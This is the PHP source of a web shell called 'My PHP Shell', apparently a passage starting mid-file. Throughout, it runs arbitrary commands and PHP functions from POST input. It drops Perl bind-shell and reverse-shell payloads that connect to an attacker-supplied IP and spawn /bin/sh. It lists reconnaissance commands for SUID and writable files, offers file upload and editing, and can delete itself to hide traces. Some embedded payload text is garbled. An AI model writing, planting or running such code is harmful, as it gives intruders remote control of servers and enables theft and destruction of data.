"find / -type f -name "), array("Find all writable dirs/files in /" =>"find / -perm -2 -ls"), array("Find all suid files in /" =>"find / -type f -perm -04000 -ls"), array("Find all sgid files in /" =>"find / -type f -perm -02000 -ls"), array("Show open ports" =>"netstat -an | grep -i listen"), array("Show NIC configuration" =>"ip addr show"), ); /*==================END_CONFIG=============*/ foreach ($aliases as $n => $alias_array){ $aliases_str.="\n"; $my_aliases .="myAliases[$n]='". $alias_array[key($alias_array)] . "';\n\t\t"; } $content=array( "ID" =>execute_simple("id"), "UNAME" =>execute_simple("uname -a"), "DATE" =>execute_simple("date"), "SERVER_SIGNATURE" =>$_SERVER['SERVER_SIGNATURE'], "PORT" =>DEFAULT_PORT, "MY_IP" =>MY_IP, "PWD" =>getcwd(), "RESULT" =>"", "CMD" =>$_POST['cmd'], "ALIASES" =>$aliases_str, "MY_ALIASES" =>$my_aliases, "PHP_SELF" =>$_SERVER['PHP_SELF'], ); /* From here edit if you know what you are doing */ if($_POST['cmd']!=""){ if(preg_match('/^clear/',$_POST['cmd'])){ // Clearing the buffer $_SESSION['buf'] = array(); $_SESSION['buf_size'] = 0; }else if(preg_match('/^cd/',$_POST['cmd'])){ /* If we got some "cd" command the behavior should be like in a real shell enviroment */ if($_POST['cmd']=='cd'){ @chdir(dirname($_SERVER['SCRIPT_FILENAME']));//home dir :) } else{ $the_dir=substr($_POST['cmd'],3); $res=change_dir($the_dir); if($the_dir==$res){ chdir($the_dir); }else{ $result_cmd=$res; } } $content['PWD'] = getcwd(); }else{ $my_string = load_buffer($_SESSION['buf']); $my_cmd=execute_with_trap($_POST['cmd']); save_buffer($_SESSION['buf'], $_SESSION['buf_size'], "$ " . $_POST['cmd'] . "\n"); save_buffer($_SESSION['buf'], $_SESSION['buf_size'], $my_cmd); $content['RESULT'] = $my_string ."$ " . $_POST['cmd'] . "\n" . $my_cmd; } } if($_POST['ajax']=="1"){ // We got here an httpRequest so we don't display all shit if($_POST['fn']!=""){ if($_POST['nr']!=""){ //function parameters? how many? $nr=(int)$_POST['nr']; for($i=0;$i<=$nr;$i++){ $params[]=$_POST['parm'.$i]; } $ret=call_user_func_array($_POST['fn'],$params); }else{ $ret=call_user_func($_POST['fn']); } } if($ret) echo $ret; // Display the response }else{ if($_POST['submit'] != ""){ switch ($_POST['submit']){ case "Upload": $GLOBALS['error'] = upload(); display($content); break; case "Edit": display_editor($_POST['edit_file']); break; case "Save": save_file(); display($content); break; default: display($content); break; } }else{ display($content); } } /*=====================FUNCTIONS====================*/ /** * Simple command execution * * @param String $cmd * @return String */ function execute_simple($cmd){ $out=shell_exec($cmd); $out=str_replace("\n","",$out); return $out; } /** * Execute command and return the result * * @param String$cmd * @return unknown */ function execute_with_trap($cmd) { if ($stderr){ $tmpfile = tempnam('/tmp', 'tmp'); $cmd .= " 1> $tmpfile 2>&1; cat $tmpfile; rm $tmpfile"; } return htmlspecialchars(shell_exec($cmd), ENT_COMPAT, 'UTF-8'); } /** * Change directory * * @param String $dir * @return String */ function change_dir($dir){ if(is_dir($dir)){ if(is_readable($dir) && is_executable($dir)) return $dir; else return "You don't have permissions to access ".$dir; }else{ return $dir . " is not a directory!"; } } /** * Back connect perl script * * @param String $ip * @param String $port */ function bind_shell_perl($port){ //from r57 I think.. $perl_bs=<<&X"; open STDERR,">&X"; system("/bin/sh -i"); close X; PERL_BIND_SHELL; $tmpfile = tempnam('/tmp', '5454'); $fp=fopen($tmpfile,"w");fwrite($fp,$perl_bs);fclose($fp);//writing perl payload to tempfile $cmd= "perl $tmpfile"; shell_exec($cmd); execute_simple("rm -f $tmpfile"); } /** * Back connect perl script * * @param String $ip * @param String $port */ function back_connect_perl($ip,$port){ $perl_bs=<<&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system(\$system); close(STDIN); close(STDOUT); close(STDERR); PERL_BIND_SHELL; $tmpfile = tempnam('/tmp', '5454'); $fp=fopen($tmpfile,"w");fwrite($fp,$perl_bs);fclose($fp);//writing perl payload to tempfile $cmd= "perl $tmpfile"; shell_exec($cmd); execute_simple("rm -f $tmpfile"); } /** * Upload a file * * @return String errors * */ function upload(){ if(is_dir($_POST['file_path'])){ if( is_writable( $_POST['file_path'] ) ){ if( !file_exists( $_POST['file_path'] . "/" . $_FILES['file']['name'] ) ){ move_uploaded_file( $_FILES['file']['tmp_name'], $_POST['file_path'] . "/" . $_FILES['file']['name'] ); }else { return "File allready exists!"; } }else{ return "You do not have write permissions to this dir"; } }else{ if(!file_exists($_POST['file_path'])){ if( is_writable( dirname( $_POST['file_path'] ) ) ){ move_uploaded_file( $_FILES['file']['tmp_name'], $_POST['file_path']); }else{ return "You do not have write permissions to this dir"; } }else{ return "File allready exists!"; } } } /** * Getting previous commands buffer * * @param Array $buffer * @return String * */ function load_buffer(&$buffer){ if(!is_array($buffer)) $buffer = array(); $data = join("\n", $buffer); $data .= "\n\n"; return $data; } /** * Putting the buffer * * @param Array $buffer * @param Int $buffer_len * @param String $command * */ function save_buffer(&$buffer, &$buffer_len, $lines){ if(!is_int($buffer_len)) $buffer_len = 0; $lines = explode("\n", $lines); $len = count($lines); if(($buffer_len + $len) > BUFFER_MAX_LINES){ $drop = $buffer_len + $len - BUFFER_MAX_LINES; $buffer_len -=$drop; while($drop--){ array_shift($buffer); } } $buffer_len += $len; while($len--){ array_push($buffer, array_shift($lines)); } } /** * Unseting the sessiong and destroing the script * **/ function destroy(){ //this function deletes the script and clears sessions $_SESSION = array(); session_destroy(); @unlink($_SERVER['SCRIPT_FILENAME']); } /** * Save edited file * */ function save_file(){ global $error; $file_path = $_POST['filepath']; $content = $_POST['content']; $content = stripslashes($content); if(!is_dir($file_path)){ if(file_exists($file_path)){ if(is_writable($file_path)){ $fp = fopen($file_path,"w"); fwrite($fp,$content); fclose($fp); }else { $error = "'$file_path' is not writable!"; } }else{ if(is_writable(dirname($file_path))){ $fp = fopen($file_path,"w"); fwrite($fp,$content); fclose($fp); }else{ $error = "$file_path' is not writable!"; } } }else { $error = "'$file_path' is a directory!"; } } /** * Display editor */ function display_editor($file){ if(!is_dir($file)){ if(is_readable($file)){ if(is_writable($file)){ $content = file_get_contents($file); }else { $error = "'$file' is not writable!"; } }else { $error = "'$file' is not readable!"; } }else { $error = "'$file' is a directory!"; } ob_start(); ?> My PHP Shell <?echo VERSION;?>

Save to file path:

My PHP Shell <?echo VERSION;?>
My PHP Shell v0.1


uname -a {UNAME}
id {ID}
httpd {SERVER_SIGNATURE}
date {DATE}
pwd {PWD}
Executed:   {CMD}

BindShell:  
  | 
Back-Connect:   :
  |  Upload:     |  Edit file:  
$value){ $html_content=str_replace("{".$pattern."}",$value,$html_content); //some template shit... } ob_end_clean(); echo $html_content; } ?>